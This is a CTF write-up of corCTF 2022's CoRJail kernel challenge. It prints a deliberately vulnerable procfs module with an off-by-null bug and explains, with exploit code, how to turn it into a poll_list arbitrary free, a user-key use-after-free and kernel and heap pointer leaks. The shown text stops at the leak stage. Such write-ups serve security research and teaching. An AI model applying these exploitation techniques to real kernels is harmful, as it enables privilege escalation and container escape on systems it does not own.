[corCTF 2022] CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll

CoRJail is a kernel exploitation challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters by exploiting an Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. With this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from an nsjail and gaining root privileges on a Container Optimized OS. Let’s get started!

Overview

Last year, FizzBuzz101 and I designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. Over the past year, the technique has been extensively used in real-world exploits and was later extended to work with FUSE instead of userfaultfd.

For corCTF 2022, we decided to do the same, designing two challenges whose solutions required a novel approach. I decided to write CoRJail, demonstrating a novel approach I originally used to compromise Google’s kCTF. This technique consists of an arbitrary free primitive, obtainable in almost every general-purpose cache, that exploits poll_list objects. FizzBuzz101 instead designed Cache of Castaways, a challenge whose solution required a cross-cache overflow into cred_jar to corrupt the current task’s cred structure and get root privileges.

CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image, improperly called CoROS. The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing the Linux Kernel Key Retention Service to be accessed from within the container. The custom seccomp profile can be found here.

The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.

All modern protections, like KASLR, SMEP, SMAP, KPTI, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED etc. were enabled. CONFIG_STATIC_USERMODEHELPER was set to true, forcing usermode helper calls through a single binary and CONFIG_STATIC_USERMODEHELPER_PATH was set to an empty string. In other words, no modprobe_path trick. Finally, I unset CONFIG_DEBUG_FS and CONFIG_KALLSYMS_ALL, making many symbols not available in /proc/kallsyms.

The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs interface, was created to actually display per-CPU syscall count, restricting the displayed result only to syscalls specified in a filter. Users were allowed to set a new filter using echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon. For example: echo -n 'sys_read,sys_write' > /proc_rw/cormon.

The default CoRMon filter was actually a hint: it displayed many of the syscalls I used in my exploit, namely poll(), keyctl() and setxattr().

If you want to solve the challenge before reading the rest of the article, it can be found in the corCTF 2022 Public Archive.

Please note that I could not upload the coros.qcow2 image to GitHub because of its size, so you will need to build it yourself using the provided script.

TL;DR

Exploit an Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get an Out-Of-Bounds Read. Leak a kernel pointer and a heap pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key, then guess the correct options on the CoR Flag License Website to get the actual flag.

It’s Only A Zero, What Could Go Wrong?

Given the relatively complex exploitation stage and the 48-hour limit, I decided to make the bug extremely easy to spot and trigger. On the other hand, I decided not to provide source code, considering that the reverse engineering process would not have taken too long.

Here is the original CoRMon source code:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/slab.h>
#include <linux/types.h>
#include <linux/seq_file.h>
#include <trace/syscall.h>
#include <asm/syscall.h>
#include <asm/ftrace.h>

MODULE_AUTHOR("D3v17");
MODULE_LICENSE("GPL");

extern struct syscall_metadata *syscall_nr_to_meta(int nr);
extern const char *get_syscall_name(int syscall_nr);

static int get_syscall_nr(char *sc);
static int update_filter(char *syscalls);
static int cormon_proc_open(struct inode *inode, struct  file *file);
static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf,size_t count, loff_t *ppos); 
static void *cormon_seq_start(struct seq_file *seqfile, loff_t *pos);
static void *cormon_seq_next(struct seq_file *seqfile, void *v, loff_t *pos);
static void cormon_seq_stop(struct seq_file *seqfile, void *v);
static int cormon_seq_show(struct seq_file *f, void *ppos);
static int init_procfs(void);
static void cleanup_procfs(void);

DECLARE_PER_CPU(u64[NR_syscalls], __per_cpu_syscall_count);

static uint8_t filter[NR_syscalls];
static struct proc_dir_entry *cormon;
static char initial_filter[] = "sys_execve,sys_execveat,sys_fork,sys_keyctl,sys_msgget,sys_msgrcv,"
                                "sys_msgsnd,sys_poll,sys_ptrace,sys_setxattr,sys_unshare";


static const struct proc_ops cormon_proc_ops = {
    .proc_open  = cormon_proc_open,
    .proc_read  = seq_read,
    .proc_write = cormon_proc_write
};


static struct seq_operations cormon_seq_ops = {
    .start  = cormon_seq_start,
    .next   = cormon_seq_next,
    .stop   = cormon_seq_stop,
    .show   = cormon_seq_show
};


static int get_syscall_nr(char *sc)
{
    struct syscall_metadata *entry;
    int nr;

    for (nr = 0; nr < NR_syscalls; nr++)
    {
        entry = syscall_nr_to_meta(nr);

        if (!entry)
            continue;

        if (arch_syscall_match_sym_name(entry->name, sc))
            return nr;
    }

    return -EINVAL;
}


static int update_filter(char *syscalls)
{
    uint8_t new_filter[NR_syscalls] = { 0 };
    char *name;
    int nr;

    while ((name = strsep(&syscalls, ",")) != NULL || syscalls != NULL)
    {
        nr = get_syscall_nr(name);

        if (nr < 0)
        {
            printk(KERN_ERR "[CoRMon::Error] Invalid syscall: %s!\n", name);
            return -EINVAL;
        }

        new_filter[nr] = 1;
    }

    memcpy(filter, new_filter, sizeof(filter));

    return 0;
}


static int cormon_proc_open(struct inode *inode, struct  file *file)
{
    return seq_open(file, &cormon_seq_ops);
}


static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    loff_t offset = *ppos;
    char *syscalls;
    size_t len;

    if (offset < 0)
        return -EINVAL;

    if (offset >= PAGE_SIZE || !count)
        return 0;

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count;

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC);
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len))
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00';

    if (update_filter(syscalls))
    {
        kfree(syscalls);
        return -EINVAL;
    }

    kfree(syscalls);

    return count;
}


static void *cormon_seq_start(struct seq_file *s, loff_t *pos)
{
    return *pos > NR_syscalls ? NULL : pos;
}


static void *cormon_seq_next(struct seq_file *s, void *v, loff_t *pos)
{
    return (*pos)++ > NR_syscalls ? NULL : pos;
}


static void cormon_seq_stop(struct seq_file *s, void *v)
{
    return;
}


static int cormon_seq_show(struct seq_file *s, void *pos)
{
    loff_t nr = *(loff_t *)pos;
    const char *name;
    int i;

    if (nr == 0)
    {
        seq_putc(s, '\n');

        for_each_online_cpu(i)
            seq_printf(s, "%9s%d", "CPU", i);

        seq_printf(s, "\tSyscall (NR)\n\n");
    }

    if (filter[nr])
    {
        name = get_syscall_name(nr);

        if (!name)
            return 0;

        for_each_online_cpu(i)
            seq_printf(s, "%10llu", per_cpu(__per_cpu_syscall_count, i)[nr]);

        seq_printf(s, "\t%s (%lld)\n", name, nr);
    }

    if (nr == NR_syscalls)
        seq_putc(s, '\n');

    return 0;
}


static int init_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Init] Initializing module...\n");

    cormon = proc_create("cormon", 0666, NULL, &cormon_proc_ops);

    if (!cormon)
    {
        printk(KERN_ERR "[CoRMon::Error] proc_create() call failed!\n");
        return -ENOMEM;
    }

    if (update_filter(initial_filter))
        return -EINVAL;

    printk(KERN_INFO "[CoRMon::Init] Initialization complete!\n");

    return 0;
}


static void cleanup_procfs(void)
{
    printk(KERN_INFO "[CoRMon::Exit] Cleaning up...\n");

    remove_proc_entry("cormon", NULL);

    printk(KERN_INFO "[CoRMon::Exit] Cleanup done, bye!\n");
}


module_init(init_procfs);
module_exit(cleanup_procfs);

We can interact with the module through a procfs interface using read() and write(). When we use write(), the cormon_proc_write() function is called to process the user input. The cormon_seq_show() function, instead, is used to display syscall information when we use read().

As we can see, there is a clear Off-By-Null in cormon_proc_write(). Let’s extract the function from source code and ignore the rest:

static ssize_t cormon_proc_write(struct file *file, const char __user *ubuf, size_t count, loff_t *ppos) 
{
    [...]

    len = count > PAGE_SIZE ? PAGE_SIZE - 1 : count; // [1]

    syscalls = kmalloc(PAGE_SIZE, GFP_ATOMIC); // [2]
    printk(KERN_INFO "[CoRMon::Debug] Syscalls @ %#llx\n", (uint64_t)syscalls);

    if (!syscalls)
    {
        printk(KERN_ERR "[CoRMon::Error] kmalloc() call failed!\n");
        return -ENOMEM;
    }

    if (copy_from_user(syscalls, ubuf, len)) // [3]
    {
        printk(KERN_ERR "[CoRMon::Error] copy_from_user() call failed!\n");
        return -EFAULT;
    }

    syscalls[len] = '\x00'; // [4]

    [...]
}

If the number of bytes written is greater than PAGE_SIZE (4096) then the len variable is set to PAGE_SIZE - 1, otherwise it is set to count. [1]

Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k [2] and the list of syscalls is copied from user-space to kernel-space: it will be parsed by update_filter(). [3] The list, now copied to kernel-space, is subsequently null terminated. [4]

The check clearly does not cover the case where the number of bytes written is exactly PAGE_SIZE. In that case, len is equal to count, and the line syscalls[len] = '\x00' becomes syscalls[4096] = '\x00', writing the null byte one byte past the end of the 4096-byte chunk.

This will be enough to escape from the container and get root privileges on the host.
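The boundary case can be checked with a small user-space model of the length computation. This is only a sketch: cormon_len() copies the ternary from step [1], while null_write_is_oob() and cormon_len_fixed() are hypothetical helpers introduced here for illustration, not part of CoRMon.

```c
#include <stdbool.h>
#include <stddef.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096UL
#endif

/* Mirrors the length computation in cormon_proc_write(), step [1]. */
size_t cormon_len(size_t count)
{
    return count > PAGE_SIZE ? PAGE_SIZE - 1 : count;
}

/* True when the terminating write syscalls[len] = 0 would land outside
 * the PAGE_SIZE-byte buffer, i.e. when len is not a valid index. */
bool null_write_is_oob(size_t count)
{
    return cormon_len(count) >= PAGE_SIZE;
}

/* Hypothetical fix: comparing with >= keeps len at PAGE_SIZE - 1 or less. */
size_t cormon_len_fixed(size_t count)
{
    return count >= PAGE_SIZE ? PAGE_SIZE - 1 : count;
}
```

Only count == PAGE_SIZE slips through: smaller values index inside the buffer, and larger values are clamped to PAGE_SIZE - 1.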

A Dive Into poll_list Objects

As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces and this prevents us from accessing many kernel features.

Many other syscalls are also blocked, including msgget(), msgsnd() and msgrcv(), so this time the good old msg_msg will be left out of the picture.

Instead, our exploitation process will mainly rely on poll_list objects. This structure can be used from within the container without having to meet any specific requirements.

The technique we will cover in this article is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, whereas here we only have a single null byte written out of bounds.

poll_list objects are allocated in kernel space when we use the poll() syscall to monitor activity on one or more file descriptors.

int poll(struct pollfd fds[], nfds_t nfds, int timeout);

poll() accepts three arguments:

fds: an array of pollfd structures.
nfds: the number of pollfd structures in the fds array.
timeout: the number of milliseconds poll() should wait for an event to occur.

struct pollfd {
    int   fd;
    short events;
    short revents;
};

struct poll_list {
    struct poll_list *next; // [1]
    int len; // [2]
    struct pollfd entries[]; // [3]
};

The poll_list structure consists of a pointer to the next poll_list [1], a length field holding the number of pollfd structures in the entries array [2], and entries, a flexible array of pollfd structures [3]. Each entry is 8 bytes in size.

When we use the poll() syscall, do_sys_poll() is called in kernel-space. This function is responsible for copying the entries we passed to poll() in the fds array to kernel-space:

#define POLL_STACK_ALLOC 256
#define PAGE_SIZE 4096

#define POLLFD_PER_PAGE  ((PAGE_SIZE-sizeof(struct poll_list)) / sizeof(struct pollfd))

#define N_STACK_PPS ((sizeof(stack_pps) - sizeof(struct poll_list))  / \
            sizeof(struct pollfd))

[...]

static int do_sys_poll(struct pollfd __user *ufds, unsigned int nfds,
        struct timespec64 *end_time)
{

    struct poll_wqueues table;
    int err = -EFAULT, fdcount, len;
    /* Allocate small arguments on the stack to save memory and be
        faster - use long to make sure the buffer is aligned properly
        on 64 bit archs to avoid unaligned access */
    long stack_pps[POLL_STACK_ALLOC/sizeof(long)]; // [1]
    struct poll_list *const head = (struct poll_list *)stack_pps;
    struct poll_list *walk = head;
    unsigned long todo = nfds;

    if (nfds > rlimit(RLIMIT_NOFILE))
        return -EINVAL;

    len = min_t(unsigned int, nfds, N_STACK_PPS); // [2]

    for (;;) {
        walk->next = NULL;
        walk->len = len;
        if (!len)
            break;

        if (copy_from_user(walk->entries, ufds + nfds-todo,
                    sizeof(struct pollfd) * walk->len))
            goto out_fds;

        todo -= walk->len;
        if (!todo)
            break;

        len = min(todo, POLLFD_PER_PAGE); // [3]
        walk = walk->next = kmalloc(struct_size(walk, entries, len),
                        GFP_KERNEL); // [4]
        if (!walk) {
            err = -ENOMEM;
            goto out_fds;
        }
    }

    poll_initwait(&table);
    fdcount = do_poll(head, &table, end_time); // [5]
    poll_freewait(&table);

    if (!user_write_access_begin(ufds, nfds * sizeof(*ufds)))
        goto out_fds;

    for (walk = head; walk; walk = walk->next) {
        struct pollfd *fds = walk->entries;
        int j;

        for (j = walk->len; j; fds++, ufds++, j--)
            unsafe_put_user(fds->revents, &ufds->revents, Efault);
    }
    user_write_access_end();

    err = fdcount;
out_fds:
    walk = head->next;
    while (walk) { // [6]
        struct poll_list *pos = walk;
        walk = walk->next;
        kfree(pos);
    }

    return err;

Efault:
    user_write_access_end();
    err = -EFAULT;
    goto out_fds;
}

do_sys_poll() has two paths, a slow and a fast path. As we can see at the beginning of the function, stack_pps [1], a buffer of 256 bytes, is defined. It is used to store the first 30 pollfd entries [2]. This is the fast path: entries are stored on the stack to save memory and improve speed.

If we submit more than 30 pollfd entries, we enter the slow path and the remaining ones are allocated on kernel heap. This means that if we do the math correctly, controlling the number of monitored file descriptors, we can control the allocation size, ranging from kmalloc-32 to kmalloc-4k. [4]

It is possible to allocate a maximum of POLLFD_PER_PAGE (510) entries per page. [3] If this limit is exceeded, a new poll_list is allocated to store the remaining entries and it is connected to the previous one in a singly linked list. The for loop continues until all entries have been stored in kernel memory.
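The size arithmetic above can be sketched in user space. The helper below is a hypothetical model, not kernel code: poll_heap_allocs() replays the loop in do_sys_poll() to list the heap allocations requested for a given nfds, and kmalloc_cache() maps a size to a general-purpose cache, assuming the usual x86-64 cache sizes and a 16-byte poll_list header.

```c
#include <stddef.h>

#define POLL_STACK_ALLOC 256
#define POLL_LIST_HDR    16    /* next (8) + len (4) + padding (4) on x86-64 */
#define POLLFD_SIZE      8     /* sizeof(struct pollfd) */
#define PAGE_SZ          4096

#define N_STACK_PPS     ((POLL_STACK_ALLOC - POLL_LIST_HDR) / POLLFD_SIZE)
#define POLLFD_PER_PAGE ((PAGE_SZ - POLL_LIST_HDR) / POLLFD_SIZE)

/* Fill sizes[] with the byte size of every heap poll_list that
 * do_sys_poll() would request for nfds entries; returns how many. */
size_t poll_heap_allocs(size_t nfds, size_t *sizes, size_t max)
{
    size_t n = 0;
    /* The first N_STACK_PPS entries live in stack_pps, not on the heap. */
    size_t todo = nfds > N_STACK_PPS ? nfds - N_STACK_PPS : 0;

    while (todo && n < max) {
        size_t len = todo < POLLFD_PER_PAGE ? todo : POLLFD_PER_PAGE;

        sizes[n++] = POLL_LIST_HDR + len * POLLFD_SIZE;
        todo -= len;
    }
    return n;
}

/* Smallest general-purpose kmalloc cache that fits size (assumed list). */
size_t kmalloc_cache(size_t size)
{
    static const size_t caches[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096
    };

    for (size_t i = 0; i < sizeof(caches) / sizeof(caches[0]); i++)
        if (size <= caches[i])
            return caches[i];
    return 0; /* larger than a page: never requested by do_sys_poll() */
}
```

With nfds = 30 + 510 + 1 the model reports two allocations, 4096 and 24 bytes, which fall in kmalloc-4k and kmalloc-32 respectively.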

Let’s say, for example, that we call poll() with 30 + 510 + 1 file descriptors. The first 30 entries are stored on the stack, while the remaining ones result in a poll_list with 510 entries allocated in kmalloc-4k and a second poll_list, with a single entry, allocated in kmalloc-32. The structures are connected in a singly linked list.

After all poll_list objects have been allocated, there is a call to do_poll(): it will monitor provided file descriptors until a specific event occurs or the timer expires. [5] The end_time variable here, corresponds to the timeout variable we passed as third argument to the poll() syscall.

This means that poll_list objects can be kept in memory for an arbitrary amount of time; when the timer expires, they are automatically freed.

The very interesting part is how poll_list structures are freed: a while loop traverses the singly linked list, freeing each of them. [6] Now let’s look at what we have from an attacker’s perspective.

We have a structure that can be allocated in multiple caches, ranging from kmalloc-32 to kmalloc-4k, and the object pointed to by its next field (first QWORD) is automatically freed when a timer that we control expires. This means that, given an Out-Of-Bounds Write or a Use-After-Free Write primitive, we can overwrite the next field of a poll_list structure with the address of a target object, and when the timer fires, that object will be automatically freed.

The only constraint is that the first QWORD of the target object must be NULL; otherwise the while loop will treat it as a valid pointer and will try to follow it. This is not a problem: we can use a misaligned free primitive, or we can simply target objects whose first QWORD is equal to zero.

In the specific case of kmalloc-4k, if the poll_list->next field already contains a valid pointer to another poll_list, we can corrupt it with a partial overwrite (even of a single byte), making it point to another object in the slab. When the timer expires, the kernel will be tricked into freeing the wrong object. This is exactly what we are going to do in the exploit.
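The free loop and its constraint can be replayed in user space. The following is a simulation under stated assumptions: mock_kfree() only records pointers instead of releasing memory, union slot stands in for "any other 32-byte object", and demo_arbitrary_free() is a hypothetical driver that plays the role of the corruption.

```c
#include <stddef.h>
#include <string.h>

struct poll_list {
    struct poll_list *next;
    int len;
};

/* A 32-byte slot that may hold a poll_list or any other object. */
union slot {
    struct poll_list as_poll_list;
    unsigned char    raw[32];
};

#define MAX_FREED 8
static void  *freed[MAX_FREED];
static size_t n_freed;

/* Stand-in for kfree(): records the pointer instead of freeing it. */
static void mock_kfree(void *p)
{
    if (n_freed < MAX_FREED)
        freed[n_freed++] = p;
}

/* Same traversal as the out_fds loop in do_sys_poll(). */
void free_poll_lists(struct poll_list *head)
{
    struct poll_list *walk = head->next;

    while (walk) {
        struct poll_list *pos = walk;

        walk = walk->next; /* first QWORD of every visited object */
        mock_kfree(pos);
    }
}

/* Redirects first.next to a victim whose first QWORD is NULL and runs
 * the loop. Returns 1 if both the poll_list and the victim were freed. */
int demo_arbitrary_free(void)
{
    union slot victim;
    struct poll_list first = { NULL, 510 };
    struct poll_list head  = { &first, 30 };

    memset(&victim, 0, sizeof(victim));      /* first QWORD == NULL */
    first.next = &victim.as_poll_list;       /* simulated corruption */

    n_freed = 0;
    free_poll_lists(&head);

    return n_freed == 2 && freed[0] == (void *)&first &&
           freed[1] == (void *)&victim;
}
```

If the victim's first QWORD were not NULL, the loop would keep walking and hand whatever that value is to kfree(), which is why the target must start with zero.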
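To see why a single null byte is enough, here is a minimal sketch of its effect on a little-endian pointer into kmalloc-32. The addresses used with it are made up, and the alignment check assumes plain 32-byte slots without debugging red zones.

```c
#include <stdint.h>

/* Effect of one null byte written over the least significant byte of a
 * little-endian 64-bit pointer, e.g. poll_list->next. */
uint64_t clear_low_byte(uint64_t ptr)
{
    return ptr & ~(uint64_t)0xff;
}

/* Is addr the start of a slot in a cache of 32-byte objects? */
int is_kmalloc32_aligned(uint64_t addr)
{
    return (addr % 32) == 0;
}
```

Because 256 is a multiple of 32, the corrupted pointer still lands on the start of a kmalloc-32 slot, up to seven slots before the original one. If the original pointer already ended in 0x00 (one slot out of every eight), nothing changes and that attempt has no effect.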

The following code can be used to allocate poll_list structures in kernel space. Note that we need to use threads to spray this object because the poll() syscall will block until a specific event occurs or the timer expires.

#define N_STACK_PPS 30
#define POLLFD_PER_PAGE 510
#define POLL_LIST_SIZE 16

#define NFDS(size) ((((size) - POLL_LIST_SIZE) / sizeof(struct pollfd)) + N_STACK_PPS)


pthread_t poll_tid[0x1000];
size_t poll_threads;
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;


struct t_args
{
    int id;
    int nfds;
    int timeout;
};


void *alloc_poll_list(void *args)
{
    struct pollfd *pfds;
    int nfds, timeout, id;

    id    = ((struct t_args *)args)->id;
    nfds  = ((struct t_args *)args)->nfds;
    timeout = ((struct t_args *)args)->timeout;

    pfds = calloc(nfds, sizeof(struct pollfd));

    for (int i = 0; i < nfds; i++)
    {
        pfds[i].fd = fds[0];
        pfds[i].events = POLLERR;
    }

    pthread_mutex_lock(&mutex);
    poll_threads++;
    pthread_mutex_unlock(&mutex);

    //printf("[Thread %d] Start polling...\n", id);
    int ret = poll(pfds, nfds, timeout); // blocks until an event occurs or the timer expires
    //printf("[Thread %d] Polling complete: %d!\n", id, ret);

    free(pfds);
    return NULL;
}


void create_poll_thread(int id, size_t size, int timeout)
{
    struct t_args *args;

    args = calloc(1, sizeof(struct t_args));

    if (size > PAGE_SIZE)
        size = size - ((size/PAGE_SIZE) * sizeof(struct poll_list));

    args->id = id;
    args->nfds = NFDS(size);
    args->timeout = timeout;

    pthread_create(&poll_tid[id], 0, alloc_poll_list, (void *)args);
}


void join_poll_threads(void)
{
    for (int i = 0; i < poll_threads; i++)
        pthread_join(poll_tid[i], NULL);
        
    poll_threads = 0;
}

[...]

fds[0] = open("/etc/passwd", O_RDONLY);

for (int i = 0; i < 8; i++)
    create_poll_thread(i, 4096 + 32, 3000);

join_poll_threads();

[...]

The Exploit - From Zero To Information Leak

The strategy we are going to use in the first part of the exploit consists of using the Off-By-Null in kmalloc-4k to corrupt the next field of a poll_list structure chained to another one in kmalloc-32, making the corrupted pointer point to another object in the slab. When the timer fires, that object will be automatically freed.

We need to choose a target structure that, once arbitrarily freed, can be corrupted to give us an Out-Of-Bounds Read primitive and a subsequent information leak. There are multiple elastic objects in the Linux kernel that may do the trick. A good candidate could be simple_xattr, but we need the first QWORD of the target object to be NULL, so we cannot use it. Since add_key() and keyctl() are not blocked by seccomp, we can opt for user_key_payload instead.

The problem with this structure is that its first member, struct rcu_head rcu, is not initialized, and since the structure is allocated with kmalloc, the first QWORD might not be NULL. A practical solution comes from setxattr(): we can use it to fill the chunk with zeros before allocating each user key.

static long
setxattr(struct dentry *d, const char __user *name, const void __user *value,
        size_t size, int flags)
{
    [...]
    
    if (size > XATTR_SIZE_MAX)
        return -E2BIG;
    kvalue = kvmalloc(size, GFP_KERNEL); // [1]
    if (!kvalue)
        return -ENOMEM;
    if (copy_from_user(kvalue, value, size)) { // [2]
        error = -EFAULT;
        goto out;
    }
    
    [...]

out:
    kvfree(kvalue); // [3]

    return error;
}

With setxattr(), we can allocate a chunk of arbitrary size [1] and fill it with arbitrary data [2], then, it will be automatically freed [3]. We can exploit this function to make sure the uninitialized member of user_key_payload is actually zero.

We simply need to call setxattr() right before alloc_key(): because of the freelist’s LIFO behavior, once the chunk used by setxattr() is allocated, filled with zeros and then freed, it will be reused by the user key. Now we can be sure the first QWORD is set to NULL.
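A minimal sketch of this pairing follows. It is not the alloc_key() from the final exploit: zeroed_alloc_key() and key_payload_len() are hypothetical names, the 24-byte header assumes the x86-64 layout of user_key_payload (rcu_head, datalen, padding), and the key is added to the process keyring through the raw add_key syscall.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/xattr.h>
#include <unistd.h>

#define USER_KEY_HDR 24                   /* rcu_head (16) + datalen (2) + pad (6) */
#define PROCESS_KEYRING_ID (-2L)          /* value of KEY_SPEC_PROCESS_KEYRING */

/* Payload length that makes the whole user_key_payload chunk_size bytes. */
size_t key_payload_len(size_t chunk_size)
{
    return chunk_size > USER_KEY_HDR ? chunk_size - USER_KEY_HDR : 0;
}

/* Zero a chunk of chunk_size bytes through setxattr(), then immediately
 * allocate a user key of the same total size so it reuses that chunk.
 * Returns the key serial, or -1 on error. */
long zeroed_alloc_key(int id, const char *path, size_t chunk_size)
{
    char zeros[4096] = { 0 };
    char payload[4096];
    char desc[64];

    if (chunk_size <= USER_KEY_HDR || chunk_size > sizeof(zeros))
        return -1;

    memset(payload, 'A', sizeof(payload));
    snprintf(desc, sizeof(desc), "payload_%d", id);

    /* Return value ignored on purpose, as in the article's snippet. */
    (void)setxattr(path, "user.x", zeros, chunk_size, XATTR_CREATE);

    return syscall(SYS_add_key, "user", desc, payload,
                   key_payload_len(chunk_size), PROCESS_KEYRING_ID);
}
```

For kmalloc-32 this leaves only 8 bytes of payload per key, which is enough here because the keys are used as targets rather than as data carriers.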

With this in mind, we can start writing our exploit:

[...]

assign_to_core(0); // [1]

for (int i = 0; i < 2048; i++) // [2]
    alloc_seq_ops(i);

for (int i = 0; i < 72; i++)
{   
    setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
    keys[i] = alloc_key(n_keys++, key, 32); // [3]
}

for (int i = 0; i < 14; i++)
    create_poll_thread(i, 4096 + 24, 3000, false); // [4]

for (int i = 72; i < MAX_KEYS; i++) 
{
    setxattr("/home/user/.bashrc", "user.x", data, 32, XATTR_CREATE);
    keys[i] = alloc_key(n_keys++, key, 32); // [5]
}

[...]

First, we assign the current process to core 0 using assign_to_core() (a sched_setaffinity() wrapper), since we are working in a multi-core environment and slabs are per-CPU. [1] Then, we start spraying many seq_operations structures in kmalloc-32 to fill partial slabs, so the next allocations will end up in a brand new slab. [2]
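The exploit's assign_to_core() is not shown in this article; a possible sketch is below. It issues the sched_setaffinity syscall directly with a single-word CPU mask, so it only handles core IDs below the number of bits in an unsigned long, which is an assumption of this example rather than a property of the original helper.

```c
#include <sys/syscall.h>
#include <unistd.h>

/* Pin the calling thread to one CPU. Returns 0 on success, -1 on failure. */
int assign_to_core(int core_id)
{
    unsigned long mask;

    if (core_id < 0 || core_id >= (int)(8 * sizeof(mask)))
        return -1;

    mask = 1UL << core_id;

    /* pid 0 selects the calling thread. */
    return syscall(SYS_sched_setaffinity, 0, sizeof(mask), &mask) == 0 ? 0 : -1;
}
```

Pinning matters because each CPU works from its own active slab: sprays and frees issued from different cores would not reliably land next to each other.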

We proceed using alloc_key() (a simple add_key() wrapper) to spray many user_key_payload structures in kmalloc-32. [3] As explained above, we use setxattr() to make sure the chunk is actually zeroed out before a new user key is allocated.

Now we finally spray poll_list structures in kmalloc-4k, chained to poll_list in kmalloc-32. [4] At this point the situation in memory will probably be similar to [Fig. 1A], with unallocated chunks in white, poll_list in green, and user_key_payload in orange.

We can continue spraying more user keys in kmalloc-32, to completely saturate the slab. [5] [Fig. 1B]

We are ready to trigger the Off-By-Null bug, hijack a poll_list next pointer and trigger the arbitrary free:

[...]

write(fd, data, PAGE_SIZE); // [1]

join_poll_threads(); // [2]

[...]

We can trigger the allocation of a chunk in kmalloc-4k by writing 4096 bytes to the CoRMon procfs interface. [1] This will also cause a null byte to be written out of bounds, and will corrupt the next object in memory. Since we sprayed poll_list structures in kmalloc-4k, and each one has a pointer to a poll_list in kmalloc-32, we will be able to corrupt one of the pointers, making it point to one of the user keys we sprayed in the previous step. [Fig. 2A]

Now we can use join_poll_threads() and wait until timers expire and poll_list objects are automatically freed. [2] One of the user_key_payload will be released as well. [Fig. 2B]

We caused a Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain an Out-Of-Bounds Read primitive:

[...]

for (int i = 2048; i < 2048 + 128; i++)
    alloc_seq_ops(i); // [1]

if (leak_kernel_pointer() < 0) // [2]
{
    puts("[X] Kernel pointer leak failed, try again...");
    exit(1);
}

free_all_keys(true); // [3]

for (int i = 0; i < 72; i++)
    alloc_tty(i); // [4]

if (leak_heap_pointer(corrupted_key) < 0) // [5]
{
    puts("[X] Heap pointer leak failed, try again...");
    exit(1);
}

[...]

First, we spray many seq_operations structures in kmalloc-32. One of them will overwrite the user key we freed in the previous step, corrupting its datalen field (an unsigned short) with the two lower bytes of the single_next pointer.

In our case, the two lower bytes of single_next are 0x4330, so this will give us a huge Out-Of-Bounds Read primitive. A proc_single_show() pointer instead, will overwrite the first qword in the user key data field. [1] You can see the seq_operations structures in yellow in [Fig. 3A], one of them corrupted the key.
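The overlap can be verified with layout-compatible stand-ins for the two kernel structures. This is a sketch assuming x86-64 (little-endian, 8-byte pointers); the fake_ structure names and the pointer values used with it are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for struct user_key_payload in a 32-byte chunk. */
struct fake_user_key_payload {
    uint64_t rcu_next;   /* struct rcu_head: next */
    uint64_t rcu_func;   /* struct rcu_head: func */
    uint16_t datalen;
    uint8_t  pad[6];
    uint8_t  data[8];    /* flexible array in the kernel */
};

/* Stand-in for struct seq_operations: four function pointers. */
struct fake_seq_operations {
    uint64_t start, stop, next, show;
};

/* datalen as the key subsystem would see it once a seq_operations
 * structure has been allocated over the freed key. */
uint16_t datalen_after_overlap(const struct fake_seq_operations *ops)
{
    struct fake_user_key_payload key;

    memcpy(&key, ops, sizeof(key));
    return key.datalen;
}
```

The next pointer sits at offset 16, exactly where datalen lives, and show sits at offset 24, where the key data begins. This is why reading the key returns the show pointer first, followed by the contents of the following chunks.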

We can now use leak_kernel_pointer() to iterate through all the keys until we leak the proc_single_show address, this way we will identify the corrupted key and we will be able to calculate the kernel base address. [2] Now we need to reuse the Out-Of-Bounds Read primitive to leak a heap address.
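The body of leak_kernel_pointer() is not shown here, so the following is only a sketch of the arithmetic it needs. It assumes the default x86-64 layout (kernel image mapped between 0xffffffff80000000 and 0xffffffffc0000000, KASLR slide in 2 MiB steps), and any symbol address passed to it is a placeholder to be taken from the target kernel image. The ROP chain later in this article adds kernel_base to unrelocated addresses, which suggests kernel_base holds this slide.

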